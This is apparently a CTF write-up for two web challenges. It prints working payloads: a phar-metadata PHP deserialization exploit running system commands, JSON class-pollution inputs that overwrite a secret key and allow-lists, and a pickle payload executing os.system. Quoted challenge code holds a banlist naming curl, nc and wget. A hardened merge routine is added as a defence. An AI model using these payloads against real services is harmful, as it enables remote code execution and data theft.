强网拟态 (Qiangwang Mimic) CTF writeup

This post was last updated on 14 December 2024 (afternoon)

capoo

```
capoo=file:///var/www/html/showpic.php
```

Reading the source code:

```php
<?php
class CapooObj {
    public function __wakeup()
    {
        $action = $this->action;
        $action = str_replace("\"", "", $action);
        $action = str_replace("\'", "", $action);
        $banlist = "/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|\~|\`|\r|\n|\t|\ |\^|ls|\.|tail|watch|wget|\||\;|\:|\(|\)|\{|\}|\*|\?|\[|\]|\@|\\|\=|\<)/i";
        if(preg_match($banlist, $action)){
            die("Not Allowed!");
        }
        // __wakeup() runs whenever a CapooObj is unserialized, so the
        // deserialization itself is what reaches system()
        system($this->action);
    }
}
header("Content-type:text/html;charset=utf-8");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['capoo'])) {
    $file = $_POST['capoo'];

    // file_exists() accepts stream wrappers (file://, phar://, ...), and the
    // phar:// wrapper unserializes the archive's metadata while resolving the path
    if (file_exists($file)) {
        $data = file_get_contents($file);
        $base64 = base64_encode($data);
    } else if (substr($file, 0, strlen("http://")) === "http://") {
        $data = file_get_contents($_POST['capoo'] . "/capoo.gif");
        // the only content check on the downloaded file is this substring match
        if (strpos($data, "PILER") !== false) {
            die("Capoo piler not allowed!");
        }
        file_put_contents("capoo_img/capoo.gif", $data);
        die("Download Capoo OK");
    } else {
        die('Capoo does not exist.');
    }
} else {
    die('No capoo provided.');
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Display Capoo</title>
</head>
<body>
<img style='display:block; width:100px;height:100px;' id='base64image'
src='data:image/gif;base64, <?php echo $base64;?>' />
</body>
</html>
```

There is no direct entry point, so we go for PHP deserialization. The exploit is as follows:

```php
<?php
class CapooObj {
    public $action;
    public function __wakeup()
    {
        $action = $this->action;
        $action = str_replace("\"", "", $action);
        $action = str_replace("\'", "", $action);
        $banlist = "/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|\~|\`|\r|\n|\t|\ |\^|ls|\.|tail|watch|wget|\||\;|\:|\(|\)|\{|\}|\*|\?|\[|\]|\@|\\|\=|\<)/i";
        if(preg_match($banlist, $action)){
            die("Not Allowed!");
        }
        system($this->action);
    }
}
$a = new CapooObj();
$a->action = "du -a /";
$tttang = new Phar('test.phar', 0);   // the file extension must be .phar
$tttang->startBuffering();            // start buffering Phar write operations
$tttang->setMetadata($a);             // store the custom meta-data in the manifest
$tttang->setStub("<?php __HALT_COMPILER();?>"); // set the stub, a simple PHP file; PHP recognises a file as a PHAR by the stub, which is what lets it pass upload checks
$tttang->addFromString("test.txt", "test");     // add the file to be archived
$tttang->stopBuffering();             // stop buffering writes to the Phar archive and save the changes to disk
?>
```

The download path filters on the string "PILER", so just gzip the archive to get past it:

```
gzip test.phar
```

Host the file on your own server.


Once it has been downloaded, just have it resolved through the phar:// wrapper and you are done.

ez_picker

Prototype-chain pollution, used here to overwrite secret_key:

```json
{
  "__init__": {
    "__globals__": {
      "secret_key": "114514"
    }
  }
}
```

While at it, pollute the WAF lists as well:

```json
{
  "username": "test",
  "password": "test",
  "__init__": {
    "__globals__": {
      "safe_modules": [
        "\r",
        "os",
        "builtins",
        "getattr",
        "builtins\r",
        "getattr\r",
        "eval",
        "eval\r",
        "os\r", "system\r",
        "print",
        "print\r",
        "dict",
        "globals"
      ],
      "safe_names": [
        "\r",
        "os",
        "builtins",
        "getattr",
        "builtins\r",
        "getattr\r",
        "eval",
        "eval\r",
        "os\r", "system\r",
        "print",
        "print\r",
        "dict",
        "globals"
      ]
    }
  }
}
```

After that, forge the JWT and upload the pickle file. I wanted a reverse shell, but found the box has no outbound network access.

So just write the output into app.py to get it echoed back:

```
cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'builtins'
tRp1
cbuiltins
getattr
(g1
S'eval'
tR(S'__import__("os").system("cat /tr3e_fl4g_1s_h3re_lol> app.py")'
tR.
```
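As an added defensive example (not code from the writeup or from the challenge), here is a recursive JSON merge hardened against the class-pollution payloads shown above: it refuses underscore-prefixed keys and never descends into functions, methods, modules or classes, so a key path like `__init__` -> `__globals__` can no longer reach `secret_key` or the `safe_modules`/`safe_names` lists. The `User` class, the `secret_key` value and the `safe_merge`/`try_merge` names are assumptions, since the challenge's own merge routine is not on the page.

```python
from types import FunctionType, MethodType, ModuleType

secret_key = "original-secret"  # module global the writeup's payload targets (constructed)

class PollutionError(ValueError):
    """Raised when a merge would touch an attribute it must not reach."""

class User:
    def __init__(self, username, password):
        self.username = username
        self.password = password

def safe_merge(target, src):
    """Recursively apply a parsed-JSON dict onto a dict or plain object.
    Underscore-prefixed keys are refused and the walk never descends into
    functions, methods, modules or classes, so __init__ -> __globals__ is unreachable."""
    for key, value in src.items():
        if not isinstance(key, str) or key.startswith("_"):
            raise PollutionError(f"refusing key {key!r}")
        if isinstance(target, dict):
            if isinstance(value, dict) and isinstance(target.get(key), dict):
                safe_merge(target[key], value)
            else:
                target[key] = value
            continue
        if not hasattr(target, key):
            raise PollutionError(f"unknown attribute {key!r}")
        current = getattr(target, key)
        if isinstance(current, (FunctionType, MethodType, ModuleType, type)):
            raise PollutionError(f"refusing to descend into {key!r}")
        if isinstance(value, dict) and (isinstance(current, dict) or hasattr(current, "__dict__")):
            safe_merge(current, value)
        else:
            setattr(target, key, value)
    return target

# The secret_key pollution payload from the writeup, as parsed JSON (constructed here).
POLLUTION_PAYLOAD = {"__init__": {"__globals__": {"secret_key": "114514"}}}

def try_merge(payload):
    """Merge payload into a fresh User; return 'applied' or 'rejected'."""
    user = User("test", "test")
    try:
        safe_merge(user, payload)
    except PollutionError:
        return "rejected"
    return "applied"
```

Unknown attribute names are rejected as well, so the merge cannot be used to add new attributes to a user object.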

http://gensokyo.cn/2024/11/28/强网拟态wp/
Author: s1ain
Published: 28 November 2024